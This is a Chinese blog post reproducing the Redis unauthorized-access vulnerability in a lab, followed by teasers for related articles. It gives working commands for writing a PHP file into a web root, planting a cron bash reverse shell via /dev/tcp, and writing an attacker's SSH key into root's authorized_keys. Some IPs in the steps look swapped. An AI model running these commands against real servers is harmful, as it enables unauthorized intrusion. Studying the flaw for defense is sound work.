redis未授权漏洞复现

已于 2022-05-31 11:31:54 修改
阅读量1k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: redis 数据库 安全
于 2022-05-31 11:30:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65244586/article/details/125061251
版权

0x01 redis 漏洞简介&危害

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致以下风险:

1、任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

2、利用 Redis 自身的提供的config 命令,可以进行写入木马文件,执行flushall等恶意操作(Flushall 命令用于清空整个 Redis 服务器的数据(删除所有数据库的所有 key ))。

3、同时可以将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。

0x02 利用条件

(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略,直接暴露在公网;

(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。

我们可以通过以下命令查看是否设置了密码验证:

127.0.0.1:6379> CONFIG get requirepass
1) "requirepass"
2) ""

默认情况下 requirepass 参数是空的,这就意味着你无需通过密码验证就可以连接到 redis 服务。

你可以通过以下命令来修改该参数:

127.0.0.1:6379> CONFIG set requirepass "admin"
OK
127.0.0.1:6379> CONFIG get requirepass
1) "requirepass"
2) "admin"

设置密码后,客户端连接 redis 服务就需要密码验证,否则无法执行命令。

需要使用AUTH命令认证密码:

127.0.0.1:6379> AUTH password

0x03漏洞环境

靶机:192.168.100.134

攻击:192.168.100.129

安装redis服务:

(1)从官网下载源码的压缩包:
     wget http://download.redis.io/releases/redis-3.2.11.tar.gz 
(2)下载完成后,解压压缩包:
     tar xzf redis-3.2.11.tar.gz;
(3)然后进入解压后的目录:cd redis-3.2.11,输入make并执行;
(4)make结束后,进入src目录:cd src,将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了):
(5)返回目录redis-3.2.11,将redis.conf拷贝到/etc/目录下:
(6)编辑etc中的redis配置文件redis.conf,如下图所示:
     去掉ip绑定,允许除本地外的主机远程登录redis服务:
      # 127.0.0.1   
     关闭保护模式,允许远程连接redis服务:
      protected-mode no
(7)使用/etc/目录下的reids.conf文件中的配置启动redis服务:
      redis-server /etc/redis.conf 
      iptables -F
如果给Redis设置密码,可以通过修改/etc/redis.conf 文件来配置密码,修改完重启服务
requirepass  admin

在这里插入图片描述

0x04漏洞利用

三种漏洞利用方式

1、写入webshell 文件

一旦控制 redis 后,优先想到的是写 webshell,容错性是它最大优势。假定目标是 PHP 环境、web 的根目录为/var/www/html,按前面步骤尝试写个普通 PHP 脚本看下是否能成功解析:

本实验,由于centos的apache有点问题,用kali作为目标机,在目标机kali开一下apache服务

service httpd apache2

然后在攻击端执行如下:

$ redis-cli -p 6379 -h 192.168.100.134
192.168.100.134:6379> CONFIG SET dbfilename phpinfo.php
192.168.100.134:6379> CONFIG SET dir "/var/www/html"
192.168.100.134:6379> CONFIG SET rdbcompression no
192.168.100.134:6379> SET phpinfo"\n\n <?php phpinfo(); ?> \n\n" NX
192.168.100.134:6379> save

在这里插入图片描述
在这里插入图片描述

2、计划任务反弹shell

将反弹shell脚本写入/var/spool/cron/

注意有些Linux版本可能是需要写到/etc/crontab

set xx "\n* * * * * bash -i >& /dev/tcp/192.168.100.134/9999 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

在这里插入图片描述

3、导入ssh公钥

Redis 存在未授权访问或者弱口令并且开启了 ssh 服务的情况下,如果运行 redis 的用户是 root 用户,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中,进而可以直接登录目标服务器。

01 在攻击方生成一对 ssh key

ssh-keygen -t rsa
# 默认情况下,生成后在用户的家目录下的 .ssh 目录下

在这里插入图片描述

02 利用msf的auxiliary/scanner/redis/file_upload 模块上传文件

cd /root/.ssh/
cp id_rsa.pub  authorized_keys

在这里插入图片描述

注意为了不破坏 ssh public key,在authorized_keys文件内容前后添加几个 \n\n

在这里插入图片描述

03 使用密钥连接

cd /root/.ssh
ssh -i id_rsa root@192.168.100.129

在这里插入图片描述

Redis授权漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-29 1328
简介 Redis 默认情况下,会绑定在本地6379端口,如果没有进行相关策略,会将 Redis 服务暴露到公网上,在没有设置密码认证(默认为空)的情况下,任意用户在可以访问目标服务器的情况下授权访问Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,可以将ssh公钥写入目标服务器的 /root/.ssh/authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录...
SSRF漏洞Redis利用篇
weixin_39664643的博客
01-21 3434
SSRF漏洞Redis利用篇 SSRF–(Server-side Request Forge, 服务端请求伪造) 定义:由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务 SSRF漏洞思维导图如下,本篇主要介绍利用SSRF漏洞攻击内网Redis SSRF攻击内网Redis 当存在SSRF漏洞且内网中Redis服务可以授权访问时,利用Redis 任意文件写入成为十分常见的利用方式,一般内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议可以攻击内网
redis授权访问
Cfoxer的博客
08-08 2292
redis授权访问,一句话木马写入getshell,Redis授权写SSH公钥获得shell,Redis授权写定时任务反弹shell
Redis的config命令详解
最新发布
jkzyx123的博客
08-28 1114
Redis的config命令详解
浅谈Redis漏洞
weixin_43960884的博客
07-20 402
Redis授权访问漏洞 Redis是一种key-value键值对的非关系型数据库 默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权的访问Redis Redis还支持本地存储,也就导致任意文件写入,攻击者在授权访...
Redis漏洞汇总
Jietewang的博客
08-11 8199
前言 redis是一个key-value存储系统,拥有很强大的功能,目前的普及率很高,reids默认端口是6379。造成为授权漏洞的原因不是逻辑漏洞(:》),是安全配置作限制的原因,如果主机非内网主机,且拥有互联网IP那么redis大概率存在授权漏洞,本人遇到的是这样的。 1.授权访问漏洞 redis默认情况是空密码连接,如果在root用户下安装的话,这是十分危险的,有多危险呢?大概( )这么危险。 ...
Redis漏洞总结
2301_77498991的博客
04-10 706
主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。但是要保证硬盘文件不被删除,而主从复制则能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据是就会通过主从复制复制到其它从redis
Redis授权漏洞复现及利用(window,linux)
热门推荐
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9666
redis授权访问漏洞
Redis授权访问漏洞复现
xunhuanmao的博客
09-22 2399
Redis授权访问漏洞的环境搭建以及利用方式。
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4674
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
中间件漏洞redis
2301_80661529的博客
03-14 1034
1.Redis服务器被挖矿案例我没有体验过,那就看看别人的把2.redis常见用途缓存、数据共享分布式、1.缓存:字符类型缓存例如:热点数据缓存(例如报表、明星出轨),对象缓存、全页缓存、可以提升热点数据的访问数据。2.数据共享分布式:字符类型因为redis是分布式的独立服务,可以在多个应用之间共享例如:分步式session3.分布式锁:字符串类型setnx方法,只有不存在时才能添加成功,返回true4.全局IDint型,incrby,利用原子性分库分表的场景,一次性拿一段5.计数器。
Redis 漏洞总结
qq_41696518的博客
06-26 3259
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
Redis授权访问漏洞
m0_61506558的博客
09-10 911
VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件,由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于UNXI和Linux的免费开源软件,由VNC Server和VNC View两部分组成。VNC默认端口号为5900、5901。VNC授权访问漏洞如果被利用可能造成恶意用户直接控制target主机。
Redis Lua 沙盒逃逸漏洞(CVE-2022-0543)
chaojixiaojingang
03-18 7768
1.漏洞描述 Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。Debian以及Ubuntu发行版的源在打包Redis时,在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 2.漏洞原理 Redis一直有一个攻击点,就是在用户连接redis后,可以通过eval命令执行lua脚本,但这个脚本跑在沙箱里,正常情况下无法执行命令,读取文件。Ubuntu/D...
Redis数据库漏洞总结
星落的博客
04-13 1267
Redis简介 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。是非关系型数据库 Redis基本常识 Redis默认开放端口为6379端口,其配置文件位置为 /etc/redis/redis.conf ,Redis默认是不需要账号密码的,因此Redis授权漏洞一直很火。 Redis常用命令 set xl 123 ...
Redis系列漏洞总结
极光时流
10-06 6040
Redis系列漏洞总结 文章目录Redis系列漏洞总结环境:ubuntu16.04,redis5.0.1redis下载及安装redis 漏洞利用方式0x01 绝对路径写shell0x02 redis 写入ssh公钥0x03 Redis主从复制getshellredis 主从结合ssrf0x04redis利用crontab定时任务反弹getshell(此方式只针对centos服务器) 环境:ubuntu16.04,redis5.0.1 redis下载及安装 下载 wget http://download.
Redis授权漏洞的危害
04-04
Redis授权漏洞的危害包括但不限于以下几点: 1. 数据泄露:攻击者可以通过访问Redis授权的服务,获取到Redis中存储的敏感数据,例如用户密码、数据库信息、业务数据等。 2. 数据篡改:攻击者可以通过访问Redis授权的服务,对Redis中存储的数据进行篡改,导致业务数据的丢失或者损坏。 3. 服务拒绝:攻击者可以通过访问Redis授权的服务,对Redis进行拒绝服务攻击,导致服务不可用,影响业务正常运行。 4. 系统入侵:攻击者可以通过访问Redis授权的服务,获取到服务器的权限,从而进一步入侵系统,导致更严重的安全问题。 因此,及时发现和修复Redis授权漏洞,对于保障系统的安全和稳定运行至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值